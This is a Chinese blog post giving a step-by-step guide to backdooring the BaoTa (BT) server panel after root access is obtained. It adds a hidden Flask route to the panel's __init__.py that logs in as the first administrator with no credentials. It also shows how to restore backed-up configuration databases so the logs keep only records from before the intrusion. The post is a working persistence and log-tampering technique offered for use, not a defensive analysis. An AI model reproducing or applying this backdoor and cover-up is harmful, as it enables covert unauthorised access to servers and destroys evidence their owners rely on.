侧边栏壁纸
博主头像
Tess-Wiki 博主等级

世间万般兵刃,唯有过往伤人最深。

  • 累计撰写 200 篇文章
  • 累计创建 1 个标签
  • 累计收到 46 条评论

目 录CONTENT

文章目录
漏洞复现

宝塔BT-web端后门

Administrator
Administrator
2024-07-04 / 0 评论 / 0 点赞 / 23 阅读 / 0 字

1.前提是已有root权限

查看BT外部访问地址

[user@user ]# bt
===============宝塔面板命令行==================
(1) 重启面板服务           (8) 改面板端口
(2) 停止面板服务           (9) 清除面板缓存
(3) 启动面板服务           (10) 清除登录限制
(4) 重载面板服务           (11) 取消入口限制
(5) 修改面板密码           (12) 取消域名绑定限制
(6) 修改面板用户名         (13) 取消IP访问限制
(7) 强制修改MySQL密码      (14) 查看面板默认信息
(22) 显示面板错误日志      (15) 清理系统垃圾
(23) 关闭BasicAuth认证     (16) 修复面板(检查错误并更新面板文件到最新版)
(24) 关闭谷歌认证          (17) 设置日志切割是否压缩
(25) 设置是否保存文件历史副本  (18) 设置是否自动备份面板
(0) 取消
===============================================

请输入命令编号:14
===============================================
正在执行(14)...
===============================================
==================================================================
BT-Panel default info!
==================================================================
外网面板地址: http://192.168.1.1:8888
内网面板地址: http://192.168.1.1:8888
*以下仅为初始默认账户密码,若无法登录请执行bt命令重置账户/密码登录
username: administrator
password: a1b2c3d4
If you cannot access the panel,
release the following panel port [8888] in the security group
若无法访问面板,请检查防火墙/安全组是否有放行面板[8888]端口
==================================================================

2.查看进程中BT的文件位置

[user@user ]# ps -aux  | grep BT
user        1096  0.0  0.3 633052 12316 ?        Sl    2023 325:17 /www/server/panel/pyenv/bin/python /www/server/panel/BT-Task
user        1212  0.1  1.4 491956 56036 ?        Sl    2023 506:54 /www/server/panel/pyenv/bin/python /www/server/panel/BT-Panel
user      412027  0.0  0.0  12108  1060 pts/0    R+   21:40   0:00 grep --color=auto BT

具体文件位置

cd /www/server/panel/BTPanel/__pycache__

3.记得先备份配置数据库

/www/server/panel/data/default.db
/www/server/panel/data/system.db

cp default.db default.db2
cp system.db system.db2

3.植入后门

修改文件:/www/server/panel/BTPane/_init_.py 
在此区域添加
# ===================================Flask HOOK========================#


# ===================================普通路由区========================#
@app.route('/', methods=method_all)
def home():
    # 面板首页 
面板首页添加如下内容:

@app.route('/后门名称-只能纯英文',methods=method_all) 
def test_login(): 
    import userlogin 
    result = userlogin.userlogin() 
    userInfo = public.M('users').where("id=?",(1,)).field('id,username').find() 
    session['login'] = True 
    session['username'] = userInfo['username'] 
    session['tmp_login'] = True 
    session['uid'] = userInfo['id'] 
    result.limit_address('-') 
    cache.delete('panelNum') 
    cache.delete('dologin') 
    sess_input_path = 'data/session_last.pl' 
    public.writeFile(sess_input_path,str(int(time.time()))) 
    result.set_request_token() 
    result.login_token() 
    return redirect('/')

保存退出

重启宝塔

然后就可以去访问http://192.168.1.1:8888/abcdefg

ok,已经进去了,

然后操作完后恢复配置记录

/www/server/panel/data/default.db
/www/server/panel/data/system.db

cp default.db2 default.db
cp system.db2 system.db2

恢复完后,日志就只有操作之前的记录了。

-.-

0
版权归属: Administrator
本文链接: https://tess.ink/archives/bt-bt
许可协议: 本文使用《署名-非商业性使用-相同方式共享 4.0 国际 (CC BY-NC-SA 4.0)》协议授权

评论区